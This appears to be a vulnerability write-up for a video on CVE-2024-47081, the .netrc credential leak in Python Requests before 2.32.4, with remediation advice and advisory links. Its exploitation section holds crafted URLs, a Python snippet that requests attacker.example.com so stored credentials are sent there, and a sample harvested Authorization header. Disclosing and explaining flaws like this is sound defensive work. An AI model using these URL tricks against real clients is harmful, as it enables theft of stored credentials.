requests: Netrc credential leak in PSF requests library (CVE-2024-47081) #shorts
Summary
In today’s episode, we dive into CVE-2024-47081, a recently disclosed credential leak vulnerability in the Python Requests library. This flaw can expose .netrc authentication details when processing specially crafted URLs, potentially sending sensitive credentials to an attacker-controlled server.
Product details
The affected product is the PSF Requests HTTP library, versions prior to 2.32.4. Requests is widely used in Python applications to simplify HTTP interactions. By default (Session.trust_env is True), when a request carries no explicit auth, Requests looks up credentials for the request's host in the user's .netrc file and attaches them as HTTP Basic authentication.
Vulnerability type summary
CVE-2024-47081 is classified under CWE-522: Insufficiently Protected Credentials. The core issue is a URL parsing error in the .netrc lookup: for a maliciously crafted URL, the host string matched against .netrc can differ from the host the request is actually sent to, so credentials stored for a trusted host are attached to a request bound for another host.
Details of the vulnerability
Because of a flaw in how the URL is parsed for the .netrc lookup, Requests versions before 2.32.4 may include .netrc credentials in outgoing HTTP requests to unintended hosts. An attacker who can get a vulnerable client to request a URL they crafted can cause the client to send the username and password stored in .netrc for a trusted host to the attacker's server. To fix the issue, upgrade to Requests 2.32.4 or later. As a temporary workaround on older versions, applications can disable .netrc support by setting `trust_env=False` on their Session objects; note that this flag also stops Requests from reading proxy settings (HTTP_PROXY, HTTPS_PROXY, NO_PROXY) and CA bundle paths (REQUESTS_CA_BUNDLE, CURL_CA_BUNDLE) from the environment, so those must then be configured explicitly.
Conclusion
If you use the Requests library in your Python projects, upgrade to version 2.32.4 or later now. Review your code for any reliance on .netrc authentication, and disable it with `trust_env=False` if you cannot patch right away. Prefer passing credentials explicitly to the calls that need them over ambient credential files, and keep .netrc entries limited to the hosts that genuinely require them.
Watch the full video on YouTube: CVE-2024-47081
Remediation and exploitation details
The following actors are involved in this chain
- Malicious Actor: Creates and hosts manipulated URLs to trigger credential leakage
- Application Developer or User: Runs code with the Requests library using .netrc-based authentication
The following systems are involved
- Requests Library (<2.32.4) (Issues HTTP requests, attaching .netrc credentials when trust_env is True and no explicit auth is given): Vulnerable component that may send credentials to unintended endpoints
- .netrc File (Stores user credentials for automated authentication): Source of sensitive credentials
- Malicious Server (Hosts crafted URLs and collects leaked credentials): Attacker-controlled endpoint
Attack entry point
- Maliciously-Crafted URL: A URL designed to confuse the library's host extraction so that .netrc credentials stored for a trusted host are attached to a request destined for the attacker's domain
Remediation actions
- Upgrade Requests to 2.32.4 or later (the fix is in PR #6965, linked below)
- If you cannot upgrade yet, set `trust_env=False` on every Session (and on the module-level helpers, which create a Session per call), then configure proxies and CA bundles explicitly, since `trust_env=False` also disables reading them from the environment
- Audit hosts that run the affected code for a .netrc file and remove entries that are not required
Exploitation actions
URL parsing manipulation
- https://trusted.example.com@attacker.example.com/endpoint (the trusted host name is placed in the userinfo part of the URL while the request itself goes to attacker.example.com; the exact crafted form that triggers the bug is not given on this page)
- https://trusted.example.com?next=https://attacker.example.com/steal (an attacker-supplied target URL; this only reaches Requests if the application extracts the `next` value and requests it)
Unintended credential forwarding

```python
import requests

# trust_env defaults to True, so the Session consults ~/.netrc
# for the host it derives from the URL when no auth is supplied.
session = requests.Session()
response = session.get('https://trusted.example.com@attacker.example.com/endpoint')
```
Automatic environment trust
- The Session attaches the .netrc entry for trusted.example.com as HTTP Basic auth (dXNlcm5hbWU6cGFzc3dvcmQ= is base64 of username:password):
- Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
Credential harvest
- Logged on the attacker's server:
- GET /endpoint HTTP/1.1
- Host: attacker.example.com
- Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
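The following is an added example written for this page, not code from the Requests project. It reconstructs the host-selection step of the .netrc lookup as I read the fix commit linked below (before the fix: the URL's netloc cut at the first ':' to strip a port; after the fix: the parsed hostname) and runs it against an in-memory .netrc. The host names, credentials, and the `prepare` helper are constructed for illustration; the variant URL with a ':' ending the userinfo is my assumption about the shape that the old split logic actually matches, and the page's bare `user@host` form is shown beside it for comparison.

```python
"""Added example: .netrc host selection before and after the 2.32.4 fix.

Reconstruction for illustration, not the requests library's own code.
"""
import os
import tempfile
from netrc import netrc
from urllib.parse import urlparse

TRUSTED = "trusted.example.com"
ATTACKER = "attacker.example.com"

# Constructed .netrc contents: credentials exist only for the trusted host.
NETRC_TEXT = f"machine {TRUSTED} login username password password\n"


def host_before_fix(url: str) -> str:
    """Host key used by the vulnerable lookup (my reconstruction): the netloc
    cut at the first ':' to drop a port. Userinfo (text before '@') is kept,
    so whoever writes the URL controls what precedes that first ':'."""
    return urlparse(url).netloc.split(":")[0]


def host_after_fix(url: str) -> str:
    """Host key used after the fix: the parsed hostname, which excludes
    both userinfo and port."""
    return urlparse(url).hostname


def netrc_lookup(host: str, netrc_text: str = NETRC_TEXT):
    """Return (login, password) for host from an in-memory .netrc, or None.
    The stdlib parser wants a path, so the text is written to a temp file."""
    with tempfile.NamedTemporaryFile("w", suffix=".netrc", delete=False) as fh:
        fh.write(netrc_text)
        path = fh.name
    try:
        entry = netrc(path).authenticators(host)   # (login, account, password)
    finally:
        os.unlink(path)
    return (entry[0], entry[2]) if entry else None


def prepare(url: str, fixed: bool, trust_env: bool = True):
    """Mimic Session.prepare_request (hypothetical helper): with trust_env
    True and no explicit auth, consult .netrc for the host the lookup derives.
    Returns (destination host, credentials that would be attached or None)."""
    destination = urlparse(url).hostname        # where the request really goes
    if not trust_env:
        return destination, None                # the documented workaround
    key = host_after_fix(url) if fixed else host_before_fix(url)
    return destination, netrc_lookup(key)


if __name__ == "__main__":
    # Constructed URLs: the page's bare form, and a variant whose userinfo
    # ends in ':' so the old split logic yields the trusted host as the key.
    for url in (f"https://{TRUSTED}@{ATTACKER}/endpoint",
                f"https://{TRUSTED}:@{ATTACKER}/endpoint"):
        for fixed in (False, True):
            dest, creds = prepare(url, fixed=fixed)
            label = "fixed" if fixed else "vuln "
            print(f"{label} {url}\n      -> sent to {dest}, netrc creds: {creds}")
```

Running it shows the asymmetry the advisory describes: for the colon variant the pre-fix key is trusted.example.com (so the stored credentials are attached) while the request is delivered to attacker.example.com; with the hostname-based key, or with trust_env=False, nothing is attached. A legitimate request to https://trusted.example.com/ still receives its credentials after the fix, so the change does not break normal .netrc use.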
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7
- https://github.com/psf/requests/pull/6965
- https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef
- https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env
- https://seclists.org/fulldisclosure/2025/Jun/2
- [2025-06-03] A credential leak vulnerability (CVE-2024-47081) in the PSF requests library has been identified.
- [2025-06-04] CVE-2024-47081: Netrc credential leak in PSF requests library
- [2025-06-03] CVE-2024-47081: Netrc credential leak in PSF requests library.